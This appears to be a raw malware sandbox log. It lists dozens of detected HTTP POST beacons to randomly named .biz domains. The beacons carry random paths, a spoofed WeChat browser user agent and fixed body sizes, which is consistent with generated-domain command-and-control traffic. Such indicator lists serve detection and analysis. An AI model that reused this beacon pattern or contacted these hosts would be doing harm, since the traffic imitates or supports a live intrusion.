Source: global traffic HTTP traffic detected: POST /xmoomdas HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /qmcamdw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /akpcxuoptmorf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /armgh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /vdcxryneefpufnys HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /sskdftgh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /gbgqeacfgvpvmc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /jwmuf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /ppwjrkubwfxcghyw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /qppgqk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /rydwrcfdefifnid HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /qeqkpadihkhxvp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /wdbsliqsvat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /lmgofko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /agrlsditgvrhbmam HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /dckvav HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /qqngegncolupvk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /bioujqhkngbec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /eicbtm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /lglryrr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jjeefsoqcwkm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /xebufengtanjkobx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /qsjvwblhtwj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rewibl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /up HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /gpwbguwoy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /rcdfrlm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /iikfi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /wveptxshemmsp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vdhidkscvohylymj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /dvvwndpvxviw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /idodhoekyfd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ayk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qpwpqegnfgthpmmj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /dlmic HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /xfhqi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /nj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /qucjoqpnqvmyats HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /qega HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vkbkkro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /a HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ymbuxxmr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jihtwudooa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /sgnslm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /lj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /mtec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vwi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /ceqohx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /jvioqipfomt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /vgeign HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /woumhgcoto HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /mhcgmys HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /crmhxhtb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /evwtpcketpnsmo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /anbxlwnko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /vfovcnyrge HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /kl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /tnuhincspou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /ynmucsrhqy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /dnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /stobttwvpufmox HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /hoftnxoehn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /kifvxdykbnmyfcxa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /twuuqp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic HTTP traffic detected: POST /cjvae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
